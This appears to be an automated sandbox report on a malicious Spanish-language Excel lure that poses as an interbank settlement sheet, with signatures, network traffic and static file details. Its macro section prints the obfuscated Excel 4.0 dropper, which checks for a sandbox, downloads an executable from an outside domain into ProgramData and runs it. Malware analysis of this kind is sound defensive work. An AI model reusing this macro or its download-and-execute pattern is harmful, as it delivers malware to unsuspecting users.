Analysis Report LIQUIDACION INTERBANCARIA 02_22_2021.xls

Overview

General Information

Sample Name:LIQUIDACION INTERBANCARIA 02_22_2021.xls
Analysis ID:356267
MD5:8cc0e4d5044939ef3d7a7d8825d8c9c9
SHA1:61ca1ae2ac0fa0fb0f075ee09f9ff83985b5b66b
SHA256:35cf92b551f09ba61770ce1c7c5dc73b3c3e291eb98948c87d430646370a103f
Tags:ESP geo Outlook xls

Detection

Hidden Macro 4.0
Score:60
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Found Excel 4.0 Macro with suspicious formulas
Found obfuscated Excel 4.0 Macro
Document contains embedded VBA macros
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Unable to load, office file is protected or invalid

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2276 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Signature Overview

Compliance:

Uses new MSVCR Dlls
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Software Vulnerabilities:

Document exploit detected (UrlDownloadToFile)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
Source: global traffic | DNS query: name: www.seyranikenger.com.tr
Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 185.162.146.6:443
Source: unknown | DNS traffic detected: queries for: www.seyranikenger.com.tr
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49169
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49168
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49167
Source: unknown | Network traffic detected: HTTP traffic on port 49168 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49169 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49167 -> 443

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 | Screenshot OCR: Enable Content . , " - f """'m' I @ !|| 14 A239 " ' " " " Macro error at ed: 15 A B C D E F [LIQ
Source: Document image extraction number: 0 | Screenshot OCR: Enable Content .. A239 " ; / jx A B C D E F G H I J K 1 2 3 ERROR DOCUMENTO DE APERTURA POR
Source: Document image extraction number: 1 | Screenshot OCR: Enable Content A239 fr A B C D E f G 11 I J K 1 2 3 ERROR DOCUMENTO DE APERTURA POR QUE: E
Found Excel 4.0 Macro with suspicious formulas
Source: LIQUIDACION INTERBANCARIA 02_22_2021.xls | Initial sample: EXEC
Found obfuscated Excel 4.0 Macro
Source: LIQUIDACION INTERBANCARIA 02_22_2021.xls | Initial sample: High usage of CHAR() function: 23
Source: LIQUIDACION INTERBANCARIA 02_22_2021.xls | OLE indicator, VBA macros: true
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Window title found: microsoft excel okcannot run 'c:\programdata\a.exe'. the program or one of its components is damaged or missing.
Source: classification engine | Classification label: mal60.expl.evad.winXLS@1/4@1/1
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\Desktop\6BEE0000
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\CVRE35C.tmp
Source: LIQUIDACION INTERBANCARIA 02_22_2021.xls | OLE indicator, Workbook stream: true
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File read: C:\Users\desktop.ini
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
Source: LIQUIDACION INTERBANCARIA 02_22_2021.xls | Stream path 'Workbook' entropy: 7.96834669995 (max. 8.0)

Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Scripting21 | Path Interception | Path Interception | Masquerading1 | OS Credential Dumping | File and Directory Discovery1 | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Encrypted Channel2 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Exploitation for Client Execution13 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Disable or Modify Tools1 | LSASS Memory | System Information Discovery1 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Non-Application Layer Protocol1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Scripting21 | Security Account Manager | Query Registry | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Application Layer Protocol2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Obfuscated Files or Information1 | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | | Carrier Billing Fraud

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
seyranikenger.com.tr | 185.162.146.6 | true | false | | unknown
www.seyranikenger.com.tr | unknown | unknown | false | | unknown

      Contacted IPs

      Public

      IP | Domain | Country | Flag | ASN | ASN Name | Malicious
      185.162.146.6 | unknown | Turkey | | 60721 | BURSABILTR | false

      General Information

      Joe Sandbox Version:31.0.0 Emerald
      Analysis ID:356267
      Start date:22.02.2021
      Start time:20:28:29
      Joe Sandbox Product:CloudBasic
      Overall analysis duration:0h 4m 32s
      Hypervisor based Inspection enabled:false
      Report type:full
      Sample file name:LIQUIDACION INTERBANCARIA 02_22_2021.xls
      Cookbook file name:defaultwindowsofficecookbook.jbs
      Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
      Number of analysed new started processes analysed:4
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • EGA enabled
      • HDC enabled
      • GSI enabled (VBA)
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Detection:MAL
      Classification:mal60.expl.evad.winXLS@1/4@1/1
      Cookbook Comments:
      • Adjust boot time
      • Enable AMSI
      • Found application associated with file extension: .xls
      • Changed system and user locale, location and keyboard layout to French - France
      • Found Word or Excel or PowerPoint or XPS Viewer
      • Attach to Office via COM
      • Scroll down
      • Close Viewer
      Warnings:
      • Exclude process from analysis (whitelisted): dllhost.exe
      • VT rate limit hit for: /opt/package/joesandbox/database/analysis/356267/sample/LIQUIDACION INTERBANCARIA 02_22_2021.xls

      Simulations

      Behavior and APIs

      No simulations

      Joe Sandbox View / Context

      IPs

      No context

      Domains

      No context

      ASN


      JA3 Fingerprints

      No context

      Dropped Files

      No context

      Created / dropped Files

      C:\Users\user\AppData\Local\Temp\7AEE0000
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:data
      Category:dropped
      Size (bytes):229058
      Entropy (8bit):7.982639414599616
      Encrypted:false
      SSDEEP:6144:dFcAyojHNQB2+Uvs6Tu0EA0le7mfFjnmQW/AVc9PT:dxhkpUv30SWmc2PT
      MD5:6C7E2AB214EF2B07805B5B6139F7DDBA
      SHA1:CF16AD747082845DC7ED15D52AE17F4C5218390D
      SHA-256:29FE2CA28C39E9D370F4DF19F55BF993F68AEC530C149CD4F030DDBD89B411C7
      SHA-512:264DCFCF4F2942123FEF40A4CDAC168DD50A3A5BD49AAC6EDA4CE96EF8B322BFF4817F3E4CA15DF22CFA604B70AFBCDAE8E82E89475C2075F99A49C412F8A394
      Malicious:false
      Reputation:low
      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Tue Feb 23 03:29:45 2021, atime=Tue Feb 23 03:29:45 2021, length=12288, window=hide
      Category:dropped
      Size (bytes):867
      Entropy (8bit):4.489637393354788
      Encrypted:false
      SSDEEP:12:85QDLgXg/XAlCPCHaX2B8GB/boGkfX+WnicvblObDtZ3YilMMEpxRljKmTdJP9TK:858/XTm6GFqYe8Dv3q7rNru/
      MD5:CEB838762BF6A5323F565EBB2ED25679
      SHA1:2821E171EF1BEBDD47CC4D467FB6A57223CDC006
      SHA-256:20EC08F1EE0F838B2BD041B53E9DECC3EFB6CCB3BB5F72AA85C27EB7EACDF758
      SHA-512:F271EF4DFE69EE8A3892ACBE7D7CAB2C165E9C92D058DFC780C2AD121378E8E3BD85DD7705FC53A9B814BF8E2EA9B51DAE8C71A7D0F064BDCB43C9245A4001B1
      Malicious:false
      Reputation:low
      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\LIQUIDACION INTERBANCARIA 02_22_2021.LNK
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:17 2020, mtime=Tue Feb 23 03:29:45 2021, atime=Tue Feb 23 03:29:45 2021, length=784896, window=hide
      Category:dropped
      Size (bytes):2288
      Entropy (8bit):4.555482484816661
      Encrypted:false
      SSDEEP:48:8f/XTFGqUzjND57Qh2f/XTFGqUzjND57Q/:8f/XJGqG/7Qh2f/XJGqG/7Q/
      MD5:7E60BDA8CA27C3CC5701244AC21EF4DA
      SHA1:C2982A7D443AE41108C86D7B698851B16C38964E
      SHA-256:3A7610A376EBF8AA07157C12F89243881CABFCAFCD84DE309927082EF6141D12
      SHA-512:BF9DB02C360C878E9667BE0AB697B94EB715D59FA6349C373F2932E4355348F66D323D373D8338DFF9B8946FEE38D925DF41287FD5CB3847C92E9ACE8E6D786F
      Malicious:false
      Reputation:low
      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):161
      Entropy (8bit):4.645820606938903
      Encrypted:false
      SSDEEP:3:oyBVomMHvLJ0rmkT46lxaAvLJ0rmkT46lmMHvLJ0rmkT46lv:dj6UTtjaTTtxUTt1
      MD5:618DC56A1C2E874ECEFE016D75912A39
      SHA1:E59AAD8BC8D58CDC964EEA6E53F8984B28CFA4EB
      SHA-256:01F801B1C3886DD726A351A3D1E028F996751D6F45823B4DDD81571F9DD1E6A2
      SHA-512:FFB6D23E8E6E1FFBB9C08EC78B2A7865E787C8CAAC5FB351BD1DF31F3039CE1DA763CB4B04B48972B94A5A7809D90453DE0A4DEA987962F5AEEE48B99FC92841
      Malicious:false
      Reputation:low
      Preview: Desktop.LNK=0..[xls]..LIQUIDACION INTERBANCARIA 02_22_2021.LNK=0..LIQUIDACION INTERBANCARIA 02_22_2021.LNK=0..[xls]..LIQUIDACION INTERBANCARIA 02_22_2021.LNK=0..

      Static File Info

      General

      File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: Dexter MORGAN, Last Saved By: HP PC, Name of Creating Application: Microsoft Excel, Create Time/Date: Thu Dec 3 22:00:53 2020, Last Saved Time/Date: Mon Feb 22 09:51:33 2021, Security: 0
      Entropy (8bit):7.938164956946986
      TrID:
      • Microsoft Excel sheet (30009/1) 47.99%
      • Microsoft Excel sheet (alternate) (24509/1) 39.20%
      • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
      File name:LIQUIDACION INTERBANCARIA 02_22_2021.xls
      File size:774656
      MD5:8cc0e4d5044939ef3d7a7d8825d8c9c9
      SHA1:61ca1ae2ac0fa0fb0f075ee09f9ff83985b5b66b
      SHA256:35cf92b551f09ba61770ce1c7c5dc73b3c3e291eb98948c87d430646370a103f
      SHA512:f73682a1b16ca4271e711a539a078e266e181ec7bc9927844d285b238e789fe1ca727acce8fc2f6997c0fed163f1777e442fc390529ed96ebdb533adfdea3716
      SSDEEP:12288:27xSO0ZMQQnQ3yUZLUXA2ZGoMxFrYETEwIhMA++KnoGnkp4zL0mJm8gz:27EkznQ3bZIXASFEQwIhMA++LGkp4wmY

      File Icon

      Icon Hash:e4eea286a4b4bcb4

      Static OLE Info

      General

      Document Type:OLE
      Number of OLE Files:1

      OLE File "LIQUIDACION INTERBANCARIA 02_22_2021.xls"

      Indicators

      Has Summary Info:True
      Application Name:Microsoft Excel
      Encrypted Document:False
      Contains Word Document Stream:False
      Contains Workbook/Book Stream:True
      Contains PowerPoint Document Stream:False
      Contains Visio Document Stream:False
      Contains ObjectPool Stream:
      Flash Objects Count:
      Contains VBA Macros:True

      Summary

      Code Page:1252
      Author:Dexter MORGAN
      Last Saved By:HP PC
      Create Time:2020-12-03 22:00:53
      Last Saved Time:2021-02-22 09:51:33
      Creating Application:Microsoft Excel
      Security:0

      Document Summary

      Document Code Page:1252
      Thumbnail Scaling Desired:False
      Company:
      Contains Dirty Links:False
      Shared Document:False
      Changed Hyperlinks:False
      Application Version:1048576

      Streams with VBA

      VBA File Name: Feuil1.cls, Stream Size: 977
      General
      Stream Path:_VBA_PROJECT_CUR/VBA/Feuil1
      VBA File Name:Feuil1.cls
      Stream Size:977

      VBA Code Keywords

      Keyword
      VB_Exposed
      Attribute
      VB_Name
      VB_Creatable
      VB_PredeclaredId
      VB_GlobalNameSpace
      VB_Base
      VB_Customizable
      False
      VB_TemplateDerived
      VBA Code
      Attribute VB_Name = "Feuil1"
      Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
      Attribute VB_GlobalNameSpace = False
      Attribute VB_Creatable = False
      Attribute VB_PredeclaredId = True
      Attribute VB_Exposed = True
      Attribute VB_TemplateDerived = False
      Attribute VB_Customizable = True
      VBA File Name: ThisWorkbook.cls, Stream Size: 1142
      General
      Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
      VBA File Name:ThisWorkbook.cls
      Stream Size:1142

      VBA Code Keywords

      Keyword
      False
      VB_Exposed
      Attribute
      VB_Name
      VB_Creatable
      "ThisWorkbook"
      VB_PredeclaredId
      VB_GlobalNameSpace
      VB_Base
      VB_Customizable
      VB_TemplateDerived
      VBA Code
      Attribute VB_Name = "ThisWorkbook"
      Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
      Attribute VB_GlobalNameSpace = False
      Attribute VB_Creatable = False
      Attribute VB_PredeclaredId = True
      Attribute VB_Exposed = True
      Attribute VB_TemplateDerived = False
      Attribute VB_Customizable = True
      Sub a()
      
      
      End Sub

      Streams

      Stream Path: \x1CompObj, File Type: data, Stream Size: 108
      General
      Stream Path:\x1CompObj
      File Type:data
      Stream Size:108
      Entropy:4.18849998853
      Base64 Encoded:True
      Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 244
      General
      Stream Path:\x5DocumentSummaryInformation
      File Type:data
      Stream Size:244
      Entropy:2.67634243661
      Base64 Encoded:False
      Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 216
      General
      Stream Path:\x5SummaryInformation
      File Type:data
      Stream Size:216
      Entropy:3.65061706767
      Base64 Encoded:False
      Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 758471
      General
      Stream Path:Workbook
      File Type:Applesoft BASIC program data, first line number 16
      Stream Size:758471
      Entropy:7.96834669995
      Base64 Encoded:True
      Stream Path: _VBA_PROJECT_CUR/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 501
      General
      Stream Path: _VBA_PROJECT_CUR/PROJECT
      File Type: ASCII text, with CRLF line terminators
      Stream Size: 501
      Entropy: 5.22430114012
      Base64 Encoded: True
      Stream Path: _VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 62
      General
      Stream Path: _VBA_PROJECT_CUR/PROJECTwm
      File Type: data
      Stream Size: 62
      Entropy: 3.11998328335
      Base64 Encoded: False
      Stream Path: _VBA_PROJECT_CUR/VBA/_VBA_PROJECT, File Type: data, Stream Size: 2453
      General
      Stream Path: _VBA_PROJECT_CUR/VBA/_VBA_PROJECT
      File Type: data
      Stream Size: 2453
      Entropy: 3.93667032984
      Base64 Encoded: False
      Stream Path: _VBA_PROJECT_CUR/VBA/dir, File Type: VAX-order 68k Blit mpx/mux executable, Stream Size: 522
      General
      Stream Path: _VBA_PROJECT_CUR/VBA/dir
      File Type: VAX-order 68k Blit mpx/mux executable
      Stream Size: 522
      Entropy: 6.33446971204
      Base64 Encoded: True

      Macro 4.0 Code

      ;;;;;;;;;;;;;;;"=IF(GET.WORKSPACE(1+18);;CLOSE(TRUE))";;;;"=IF(GET.WORKSPACE(30+12);;CLOSE(TRUE))";;;;;;;;"=IF(ISNUMBER(SEARCH(""32"";GET.WORKSPACE(1)));GOTO(B126);GOTO(C126))";;;=;;"=CHAR(67)&CHAR(65)&CHAR(76)&CHAR(76)&""(""""ur""""&CHAR(108)&""""mon"""",""""UR""""&CHAR(76)&""""Down""""&CHAR(108)&""""oadToFi""""&CHAR(108)&""""eA"""",""""JJCCJJ"""",0,CHAR(104)&""""ttps://www.seyranikenger.com.tr/mensajeria_system.exe"""",""""C:\"""" & Char(80) & Char(82) & """"OGRAMDATA\a.""""&CHAR(101)&""""xe"""")""";;;;"EXEC(""C:\""&CHAR(80)&CHAR(82)&""OGRAMDATA\a.""&CHAR(101)&""xe"")";;;;"=CHAR(67)&CHAR(65)&CHAR(76)&CHAR(76)&""(""""ur""""&CHAR(108)&""""mon"""",""""UR""""&CHAR(76)&""""Down""""&CHAR(108)&""""oadToFi""""&CHAR(108)&""""eA"""",""""BBCCBB"""",0,CHAR(104)&""""ttps://www.seyranikenger.com.tr/mensajeria_system.exe"""",""""C:\"""" & Char(80) & Char(82) & """"OGRAMDATA\a.""""&CHAR(101)&""""xe"""")""""=FORMULA.FILL(D123&F123;B127)";"=FORMULA.FILL(D123&F125;C127)";;;;;;;"=FORMULA.FILL(D123&F124;B129)";"=FORMULA.FILL(D123&F124;C129)";;;;;;;;;;;=CLOSE(FALSE);=CLOSE(FALSE);;;;;;;

      Network Behavior

      Network Port Distribution

      TCP Packets

      Timestamp | Source Port | Dest Port | Source IP | Dest IP
      Feb 22, 2021 20:29:27.648983002 CET | 49167 | 443 | 192.168.2.22 | 185.162.146.6
      Feb 22, 2021 20:29:27.742896080 CET | 443 | 49167 | 185.162.146.6 | 192.168.2.22
      Feb 22, 2021 20:29:27.743176937 CET | 49167 | 443 | 192.168.2.22 | 185.162.146.6
      Feb 22, 2021 20:29:27.759762049 CET | 49167 | 443 | 192.168.2.22 | 185.162.146.6
      Feb 22, 2021 20:29:27.851521015 CET | 443 | 49167 | 185.162.146.6 | 192.168.2.22
      Feb 22, 2021 20:29:27.851588011 CET | 443 | 49167 | 185.162.146.6 | 192.168.2.22
      Feb 22, 2021 20:29:27.851608992 CET | 443 | 49167 | 185.162.146.6 | 192.168.2.22
      Feb 22, 2021 20:29:27.851680994 CET | 49167 | 443 | 192.168.2.22 | 185.162.146.6
      Feb 22, 2021 20:29:27.851742983 CET | 49167 | 443 | 192.168.2.22 | 185.162.146.6
      Feb 22, 2021 20:29:27.851780891 CET | 443 | 49167 | 185.162.146.6 | 192.168.2.22
      Feb 22, 2021 20:29:27.851845026 CET | 49167 | 443 | 192.168.2.22 | 185.162.146.6
      Feb 22, 2021 20:29:27.852747917 CET | 49167 | 443 | 192.168.2.22 | 185.162.146.6
      Feb 22, 2021 20:29:27.852771997 CET | 49167 | 443 | 192.168.2.22 | 185.162.146.6
      Feb 22, 2021 20:29:27.854356050 CET | 49168 | 443 | 192.168.2.22 | 185.162.146.6
      Feb 22, 2021 20:29:27.941406012 CET | 443 | 49168 | 185.162.146.6 | 192.168.2.22
      Feb 22, 2021 20:29:27.941555977 CET | 49168 | 443 | 192.168.2.22 | 185.162.146.6
      Feb 22, 2021 20:29:27.942599058 CET | 49168 | 443 | 192.168.2.22 | 185.162.146.6
      Feb 22, 2021 20:29:27.945056915 CET | 443 | 49167 | 185.162.146.6 | 192.168.2.22
      Feb 22, 2021 20:29:27.945135117 CET | 49167 | 443 | 192.168.2.22 | 185.162.146.6
      Feb 22, 2021 20:29:28.030073881 CET | 443 | 49168 | 185.162.146.6 | 192.168.2.22
      Feb 22, 2021 20:29:28.030098915 CET | 443 | 49168 | 185.162.146.6 | 192.168.2.22
      Feb 22, 2021 20:29:28.030174017 CET | 49168 | 443 | 192.168.2.22 | 185.162.146.6
      Feb 22, 2021 20:29:28.030303001 CET | 443 | 49168 | 185.162.146.6 | 192.168.2.22
      Feb 22, 2021 20:29:28.030318975 CET | 443 | 49168 | 185.162.146.6 | 192.168.2.22
      Feb 22, 2021 20:29:28.030369043 CET | 49168 | 443 | 192.168.2.22 | 185.162.146.6
      Feb 22, 2021 20:29:28.030576944 CET | 49168 | 443 | 192.168.2.22 | 185.162.146.6
      Feb 22, 2021 20:29:28.030603886 CET | 49168 | 443 | 192.168.2.22 | 185.162.146.6
      Feb 22, 2021 20:29:28.031795979 CET | 49169 | 443 | 192.168.2.22 | 185.162.146.6
      Feb 22, 2021 20:29:28.115371943 CET | 443 | 49168 | 185.162.146.6 | 192.168.2.22
      Feb 22, 2021 20:29:28.115542889 CET | 49168 | 443 | 192.168.2.22 | 185.162.146.6
      Feb 22, 2021 20:29:28.119436979 CET | 443 | 49169 | 185.162.146.6 | 192.168.2.22
      Feb 22, 2021 20:29:28.119607925 CET | 49169 | 443 | 192.168.2.22 | 185.162.146.6
      Feb 22, 2021 20:29:28.119946957 CET | 49169 | 443 | 192.168.2.22 | 185.162.146.6
      Feb 22, 2021 20:29:28.207520962 CET | 443 | 49169 | 185.162.146.6 | 192.168.2.22
      Feb 22, 2021 20:29:28.207573891 CET | 443 | 49169 | 185.162.146.6 | 192.168.2.22
      Feb 22, 2021 20:29:28.209122896 CET | 49169 | 443 | 192.168.2.22 | 185.162.146.6

      UDP Packets

      Timestamp | Source Port | Dest Port | Source IP | Dest IP
      Feb 22, 2021 20:29:27.522520065 CET | 52197 | 53 | 192.168.2.22 | 8.8.8.8
      Feb 22, 2021 20:29:27.628372908 CET | 53 | 52197 | 8.8.8.8 | 192.168.2.22

      DNS Queries

      Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
      Feb 22, 2021 20:29:27.522520065 CET | 192.168.2.22 | 8.8.8.8 | 0x6029 | Standard query (0) | www.seyranikenger.com.tr | A (IP address) | IN (0x0001)

      DNS Answers

      Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
      Feb 22, 2021 20:29:27.628372908 CET | 8.8.8.8 | 192.168.2.22 | 0x6029 | No error (0) | www.seyranikenger.com.tr | seyranikenger.com.tr | | CNAME (Canonical name) | IN (0x0001)
      Feb 22, 2021 20:29:27.628372908 CET | 8.8.8.8 | 192.168.2.22 | 0x6029 | No error (0) | seyranikenger.com.tr | | 185.162.146.6 | A (IP address) | IN (0x0001)

      Code Manipulations

      System Behavior

      General

      Start time: 20:29:43
      Start date: 22/02/2021
      Path: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      Wow64 process (32bit): false
      Commandline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
      Imagebase: 0x13fb30000
      File size: 27641504 bytes
      MD5 hash: 5FB0A0F93382ECD19F5F499A5CAA59F0
      Has elevated privileges: true
      Has administrator privileges: true
      Programmed in: C, C++ or other language
      Reputation: high

      Disassembly

      Call Graph

      Module: Feuil1

      Declaration

      Attribute VB_Name = "Feuil1"
      Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
      Attribute VB_GlobalNameSpace = False
      Attribute VB_Creatable = False
      Attribute VB_PredeclaredId = True
      Attribute VB_Exposed = True
      Attribute VB_TemplateDerived = False
      Attribute VB_Customizable = True

      Module: ThisWorkbook

      Declaration

      Attribute VB_Name = "ThisWorkbook"
      Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
      Attribute VB_GlobalNameSpace = False
      Attribute VB_Creatable = False
      Attribute VB_PredeclaredId = True
      Attribute VB_Exposed = True
      Attribute VB_TemplateDerived = False
      Attribute VB_Customizable = True

      Non-Executed Functions

      Sub a()
      End Sub
